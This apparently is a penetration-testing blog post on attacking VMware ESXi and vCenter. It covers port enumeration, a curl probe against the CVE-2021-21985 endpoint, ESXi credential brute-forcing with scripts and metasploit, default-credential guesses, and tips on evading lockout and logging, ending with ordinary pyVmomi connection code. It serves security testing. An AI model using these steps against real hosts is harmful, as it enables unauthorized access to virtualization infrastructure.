Before getting into the Attacking and Exploitation, it is recommended to know the difference between vSphere, vCenter and ESXI/ESX hosts.
VMware vSphere: VMware vSphere is the name given for the comprehensive virtualization platform that includes multiple software products and tools for creating, managing, and running virtual machines (VMs) on a physical server. It provides features like resource management, high availability, and centralized management.
vCenter Server: vCenter Server is a key component of the vSphere platform. It serves as a centralized management system that enables administrators to control and monitor multiple ESXi hosts and VMs. It offers features like VMotion, Distributed Resource Scheduler (DRS), and centralized management of virtual infrastructure.
ESXi (VMware vSphere Hypervisor): ESXi is a bare-metal hypervisor, which is a type 1 hypervisor installed directly on the physical server hardware. It provides the foundation for running VMs by managing the physical resources of the host, such as CPU, memory, storage, and networking, while also supporting features like vMotion and High Availability (HA). ESXi hosts are like a normal vmware or virual box that we usually setup locally - it enables users to create VM's on demand. On the other hand, vCenter Server is a management console which has the capability to control/manage Multiple ESXi hosts at once.
Reference Links
1. Soap API Guide
2. Ports and Services
3. Vcenter Security Guide ESXi Security
4. REST VAPI-HTTP Queries
5. vAPI REST API - New
Techniques
1. CVE-2021-21974 Exploit
2. VMware ESXi Zero-Day Used by Chinese Espionage Actor to Perform Privileged Guest Operations on Compromised Hypervisors | Mandiant
3. Zero Day Initiative — CVE-2020-3992 & CVE-2021-21974: Pre-Auth Remote Code Execution in VMware ESXi
Common Ports
22 - SSH Access to ESXi Host
161 - SNMP
80, 443 - ESXi Web Server, Client connector/ ESXi Host Client
902 - VMware Authentication Daemon
3260 - iscsi
5989 - CIM Broker
8000 - ESXi hosts listen on port 8000 for TCP connections from remote ESXi hosts for vMotion traffic
8080 - Used by the Storage Management Service (SMS) that is part of vCenter to access information about Virtual SAN storage profiles, capabilities, and compliance.
8889 - WS-Management for SOAP
8083, 9080, 8182, 8300, 9080, 9999 - vAPI-PicoHttp Service
Basics
- Look for the Fingerprint on Port 443 and 80 to get the ESXi Version
- See if Port 22 is enabled - Can be used to login to ESXi Shell (Default Username is root and cannot be locked out - bruteforce it)
- SSO can be enabled for the login
- To use ESXCLI, you need vCenter Server Root Certificate, you can download it if you know the address.
- Check the ESXi Host Certificates for vCenter Server address, from which you can download the certificate.
- Check for servers below 7.0.3u (Multiple Vulnerabilities)
- curl -kL https://esxi.fqdn/host -v - all the hosts for host endpoint
- Check if TCP port 427 is open for any server - SLP Service, After the patch of CVE-2020-3992 and CVE-2021-21974, SLP service is only accessible from local (127.0.0.1(ipv4) or::1(ipv6))
CVE's
CVE-2019-5544(heap buffer overflow)
CVE-2020-3992(use after free)
CVE-2021-21974(heap buffer overflow)
CVE-2022-31699(heap buffer overflow)=
VMware vCenter Server CVE-2021-21985 Remote Code Execution Vulnerability
curl -s -k -X $'POST' -H 'Host: <target>' -H 'User-Agent: curl'
-H 'Content-Type: application/json'
-H 'Connection: close'
--data-binary $'{\"methodInput\":[{\"type\":\"ClusterComputeResource\",\"value\": null,\"serverGuid\": null}]}\x0d\x0a' https://esxi.fqdn/ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData
Testing VMWARE API Access - Port 443
go to https://github.com/Bhanunamikaze/VMwareAPIPentest or
git clone https://github.com/Bhanunamikaze/VMwareAPIPentest.git
#Run below command to run a set of predefined queries against given set of hosts to check the authentication status of the API's
ESXi_Soap_Pentest.py hosts.txt output.txt
#if you want to test the queries manually - you can find the soap queries here
raw.githubusercontent.com/Bhanunamikaze/VMwareAPIPentest/main/Soap_Queries.xml
Access ESXi Hosts Remotely
Register and download esxcli from here - esxcli works only from ESXi 7.0 Version
Basic Commands:
# Accessing using config file
# Save the below contents into a file and use it as -config
VI_PSC = XX.XXX.XXX.XX
VI_USERNAME = administrator@vsphere.local
VI_PASSWORD = admin_password
VI_PROTOCOL = https
VI_SERVER = my_vc
Example:
esxcli --config <my_saved_config> network ip interface list
esxcli -s 10.10.10.10 --cacertsfile cert.0
# Allin Command Line
esxcli --server <vc_hostname_or_IP> --username <privileged_user> --password <password> --vihost
<esxi_hostname_or_IP> <namespace> [<namespace]...> <command> --<option_name=option_value>
Bruteforce ESXI Hosts
pip install pyVim
git clone https://github.com/Bhanunamikaze/ESXiBrute.git
cd ESXiBrute
python ESXi_Brute.py --hosts hosts.txt --usernames usernames.txt --passwords passwords.txt --cert cert.pem [--output output.csv]
Reference: ESXiBrute
Note: You can find the certificate from VMWare vCenter UI (You can find vCenter IP Address/Hostname from ESXi HTTPS Certificate - Port 443)Bruteforce ESXi Hosts if you dont have Cert/Hostname Download and Install VMware vSphere Resxtop - VMware {code} # Add the library to PATH export LD_LIBRARY_PATH=/usr/lib/vmware/resxtop/ wget raw.githubusercontent.com/Bhanunamikaze/ESXiBrute/main/Resxtop_Brute.sh chmod +x Resxtop_Brute.sh ./Resxtop_Brute.sh hosts.txt usernames.txt passwords.txt Reference: ESXiBrute
Get Stats from ESXi Hosts using Resxtop
Download from VMware vSphere Resxtop - VMware {code}
resxtop is a command-line utility or tool that runs on linux and provides a detailed look at how ESXi uses resources in real time. You can use this to authenticate or validate available credentials or brute force the creds.
# Add the library to PATH
export LD_LIBRARY_PATH=/usr/lib/vmware/resxtop/
# Server is the vcenter and vihost is the esxi address
resxtop --server 10.10.10.10 -a --vihost 10.1.1.1
usage: resxtop [-h] [-v] [-b] [-s] [-a] [-c config file] [-d delay] [-n iterations]
[--server server-name [--vihost host-name]] [--portnumber socket-port] [--username user-name]
-h prints this help menu.
-v prints version.
-b enables batch mode.
-s enables secure mode.
-a show all statistics.
-c sets the esxtop configuration file, which by default is .esxtop60rc
-d sets the delay between updates in seconds.
-n runs resxtop for only n iterations. Use "-n infinity" to run resxtop forever.
--server remote server name.
--vihost esx host name, if --server specifies vc server.
--portnumber socket port, default is 443.
--username user name on the remote server.
Resolving ESXi Certificate Issue
When you run a command, ESXCLI first checks whether a certificate file is available. If not, ESXCLI checks whether a thumbprint of the target server is available. If not, you receive an error saying cert or thumbprint not valid. To Resolve this issue, you need to download vCenter root certificate.
Find out the vCenter Server IP Addresses/Hostname then follow below steps
#Download and Install the vCenter Server Certificate
1. Enter the URL of the vCenter Server system into a Web browser.
2. Click the Download trusted root CA certificates link or use direct download link - https://vcenter.domain.com/certs/download.zip
3.Verify that the extension of the downloaded file is .zip.
The file is a ZIP file of all certificates in the TRUSTED_ROOTS store.
4. Extract the ZIP file.
A certificates folder is extracted. The folder includes files with the extension .0, .1, and so on, which
are certificates, and files with the extension .r0, .r1, and so on which are CRL files associated with
the certificates.
5.Add the trusted root certificates to the list of trusted roots.
you can use the cert via --cacertsfile option or the VI_CACERTFILE variable.
or --thumbprint optionPort 443 - ESXi UI
#ESXi Login
https://esxi.fqdn/ui
#These files are exposed via the vSphere HTTPS-based file transfer API. These files should be monitored for modifications.
https://esxi.fqdn/host
Port 427 - SLP
It is a service discovery protocol that allows computers and other devices to find services in a local area network (LAN) without prior configuration.
- run with root privilege after ESXi 5.5
- enabled by default (before ESXi 7.0 U2c)
- After the patch of CVE-2020-3992 and CVE-2021-21974, SLP service is only accessible from local( 127.0.0.1(ipv4) or::1(ipv6))
- CVE-2022-31699 can be used to escape sandbox before ESXi 7.0u2, especially in ESXi 6.7.
- From 7.0u2, SLP service runs inside sandbox.
- From 7.0u2c, SLP service is disabled by default.
SLP Vulns:
CVE-2019-5544(heap buffer overflow)
CVE-2020-3992(use after free)
CVE-2021-21974(heap buffer overflow)
CVE-2022-31699(heap buffer overflow)
Port 902 - VMWare Authentication Daemon
- It is possible to brute force credentials on Port 902 using metasploit
- 902 Port is available only when remote access is required.
- Uses Windows Domain Login Creds - unless local access is set.
- Generally, this kind of service is not logged
- Recommended to brute force 902 port instead of RDP or ssh when.
#Bruteforcing
msfconsole
use auxiliary/scanner/vmware/vmauthd_login
#Access
nc 10.10.10.10 902
USER root
PASS toorPort 161 SNMP
- Check if SNMP Is enabled or not
- if SNMP is misconfigured - setup required alerts
Look for SNMP Attacks herePort 3260 - ISCSI
nmap -sV -Pn -p 3260 --script=iscsi-info 10.0.0.1
#Install iscsiadm
sudo apt install open-iscsi
#Discover the targets
iscsiadm -m discovery -t sendtargets -p 192.168.xx.xx
192.168.xx.xx:3260,1 iqn.1992-05.com.emc:fl1001433000190000-3-vnxe
# Login
iscsiadm -m node --targetname="iqn.1992-05.com.emc:fl1001433000190000-3-vnxe" -l -p 192.168.xx.xx --login -
iscsiadm -m node --targetname="iqn.1992-05.com.emc:fl1001433000190000-3-vnxe" -p 192.168.xx.xx
Port 5989 - CIM Broker
Default user is root
# Accepts only POST Requests
curl -kL https://10.10.10.10:5989 -X POST -u root:admin -v
curl -kL https://10.10.10.10:5989 -X POST --basic --user root -v --data '<?xml version="1.0" encoding="UTF-8"?'
#Full request with headers and data
curl -vvv --insecure 'https://user:pass@localhost:5989/root/cimv2:LMI_LANEndpoint' -H 'Content-type: application/xml; charset="utf-8"' -H 'CIMOperation: MethodCall' -H 'CIMMethod: EnumerateInstances' -H 'CIMObject: root/cimv2' -H 'Accept-Encoding: identity' -d '<?xml version="1.0" encoding="utf-8" ?>
<CIM CIMVERSION="2.0" DTDVERSION="2.0"><MESSAGE ID="1001" PROTOCOLVERSION="1.0"><SIMPLEREQ><IMETHODCALL NAME="EnumerateInstances"><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH><IPARAMVALUE NAME="ClassName"><CLASSNAME NAME="LMI_LANEndpoint"/></IPARAMVALUE><IPARAMVALUE NAME="LocalOnly"><VALUE>FALSE</VALUE></IPARAMVALUE></IMETHODCALL></SIMPLEREQ></MESSAGE></CIM>'
#Vulnerabilities
ESXi 7.0.1, 6.7, 6.5 has 2 Vulnerabilities related to CIM Broker
Refer to VMWare Advisory
#Using wbecli
wget http://sourceforge.net/project/showfiles.php?group_id=128809
tar -xvf sblim-wbemcli-1.4.10.tar.gz
cd sblim-wbemcli-1.4.10
configure
make
make install
wbemcli ei -noverify -dx 'https://user:pass@localhost:5989/root/cimv2:LMI_LANEndpoint'
Port 8889 - OpenWSMan
#WWW-Authenticate: Basic realm="OPENWSMAN"
curl -kL http://10.10.10.10:8889 -X POST -u root:root
Connecting to ESXI Host using API
you will need vCenter Cert to pass the first level of authentication, you can download it from ttps://vcenter.domain.com/certs/download.zip
#Once you have the certificate, convert it to .pem file
openssl x509 -in your_certificate.crt -out your_certificate.pem -outform PEM
#Install the required packages and libraries using below commands
# Install venv
sudo apt install python3-venv
#Create a new virual env
python3 -m venv .venv/project_name
# Get into virtual env - now you are in vir env
source project_name/bin/activate
git clone https://github.com/vmware/pyvmomi.git
python setup.py install
git clone https://github.com/vmware/vsphere-automation-sdk-python.git
pip install -U lib/**/*.whl
pip install -U `pwd`
#Code to Connect to VMWare ESXi Host
import ssl
from pyVim import connect
# ESXi host connection details
host = "hostname.domian.com"
user = "your_username"
password = "your_password"
cert_path = "new.pem"
ssl_context = ssl.create_default_context(cafile=cert_path)
# Connect to the ESXi host
try:
service_instance = connect.SmartConnect(
host=host,
user=user,
pwd=password,
port=443,
sslContext=ssl_context
)
print("Connected to ESXi host:", host)
# Perform actions here
# Disconnect from the ESXi host
connect.Disconnect(service_instance)
print("Disconnected from ESXi host:", host)
except Exception as e:
print("Error:", e)
#Code to Connect to VMWARE vCenter
import requests
import urllib3
from vmware.vapi.vsphere.client import create_vsphere_client
session = requests.session()
session.verify = False
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Connect to a vCenter Server using username and password
vsphere_client = create_vsphere_client(server='10.10.10.10', username='root', password='root', session=session)
# List all VMs inside the vCenter Server
vsphere_client.vcenter.VM.list()
Script to Test if there are many IP addresses.
# Add below details in config file while update the creds and address
VI_SERVER = esxi_server_a
VI_USERNAME = root
VI_PASSWORD = toor
#Create a new .sh file with below script
# Update the command as per your automation#!/bin/bash
VI_CONFIG_FILE=/home/admin/viconfig
VIHOSTS=(esxi_server_a esx_server_b esxi_server_c)
for VIHOST in ${VIHOSTS[@]}
do
echo "Adding NAS datastore for ${VIHOST} ..."
esxcli --config ${VI_CONFIG_FILE} storage nfs add --host ${VIHOST} --share <share point> --volumename <volume name>
esxcli --config ${VI_CONFIG_FILE} storage nfs list
done
No comments:
Post a Comment